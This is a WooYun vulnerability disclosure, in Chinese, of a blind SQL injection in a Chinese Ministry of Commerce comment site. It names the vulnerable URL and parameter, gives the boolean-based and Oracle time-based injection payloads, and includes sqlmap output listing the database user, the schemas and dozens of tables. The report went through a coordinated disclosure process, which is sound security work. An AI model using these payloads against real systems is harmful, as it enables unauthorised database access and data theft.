当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130342

漏洞标题:国家商务部某分站布尔型盲注

相关厂商:国家商务部

漏洞作者: FlyfishSec

提交时间:2015-07-30 10:58

修复时间:2015-09-14 15:48

公开时间:2015-09-14 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

国家商务部某分站布尔型盲注

详细说明:

国家商务部公众留言网SQL注入漏洞

漏洞证明:

公众留言网:http://gzly.mofcom.gov.cn/website/comment/training/index.jsp
注入点:http://gzly.mofcom.gov.cn/website/comment/training/index.jsp?p_type=170
Payload:

Place: GET
Parameter: p_type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p_type=170' AND 2007=2007 AND 'JxUj'='JxUj
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: p_type=170' AND 4658=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T
2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'qSOy'='qSOy
---
[22:43:22] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


漏洞证明:

current user:    'MOFDATA'


available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MOFDATA
[*] SYS
[*] SYSTEM
[*] WMSYS


[23:08:50] [INFO] retrieved: ARTICLE
[23:09:34] [INFO] retrieved: ARTICLE_ATTACH
[23:10:34] [INFO] retrieved: ARTICLE_CATALOG
[23:11:30] [INFO] retrieved: ARTICLE_CATALOG_LOG
[23:12:12] [INFO] retrieved: ARTICLE_IMAGE
[23:12:57] [INFO] retrieved: ARTICLE_MEMBER_LOG
[23:14:13] [INFO] retrieved: ARTICLE_TOTAL_LOG
[23:15:34] [INFO] retrieved: BBS_ATTACH
[23:16:38] [INFO] retrieved: BBS_CLUB
[23:17:07] [INFO] retrieved: BBS_GROUP
[23:17:42] [INFO] retrieved: BBS_INFO
[23:18:12] [INFO] retrieved: BBS_USER
[23:18:52] [INFO] retrieved: CNCFORUM_REGISTER
[23:20:24] [INFO] retrieved: CODE_AREA
[23:21:09] [INFO] retrieved: CODE_COUN
[23:21:47] [INFO] retrieved: COI_MAIL
[23:22:22] [INFO] retrieved: COMMENT_CATEGORY
[23:23:50] [INFO] retrieved: COMMENT_DEP
[23:24:28] [INFO] retrieved: COMMENT_EDI
[23:25:07] [INFO] retrieved: COMMENT_EN_2002
[23:26:01] [INFO] retrieved: COMMENT_EN_2003
[23:26:24] [INFO] retrieved: COMMENT_EN_2004
[23:26:57] [INFO] retrieved: COMMENT_EN_2005
[23:27:20] [INFO] retrieved: COMMENT_EN_2006
[23:27:50] [INFO] retrieved: COMMENT_EN_2007
[23:28:13] [INFO] retrieved: COMMENT_EN_2008
[23:28:43] [INFO] retrieved: COMMENT_EN_2009
[23:29:13] [INFO] retrieved: COMMENT_EN_2010
[23:30:01] [INFO] retrieved: COMMENT_EN_2011
[23:30:27] [INFO] retrieved: COMMENT_EN_2012
[23:30:59] [INFO] retrieved: COMMENT_FAQ
[23:31:27] [INFO] retrieved: COMMENT_FAQ_2006
[23:32:26] [INFO] retrieved: COMMENT_FAQ_2007
[23:33:07] [INFO] retrieved: COMMENT_FAQ_2008
[23:33:30] [INFO] retrieved: COMMENT_FAQ_2009
[23:33:53] [INFO] retrieved: COMMENT_FAQ_2010
[23:34:32] [INFO] retrieved: COMMENT_FAQ_2011
[23:34:59] [INFO] retrieved: COMMENT_FAQ_2012
[23:35:33] [INFO] retrieved: COMMENT_KEYWORD
[23:36:49] [INFO] retrieved: COMMENT_KW
[23:37:08] [INFO] retrieved: COMMENT_LOCAL_2004
[23:38:23] [INFO] retrieved: COMMENT_LOCAL_2005
[23:38:53] [INFO] retrieved: COMMENT_LOCAL_2006
[23:39:24] [INFO] retrieved: COMMENT_LOCAL_2007
[23:39:52] [INFO] retrieved: COMMENT_LOCAL_2007_BOXILAI


修复方案:

过滤

版权声明:转载请注明来源 FlyfishSec@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-31 15:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论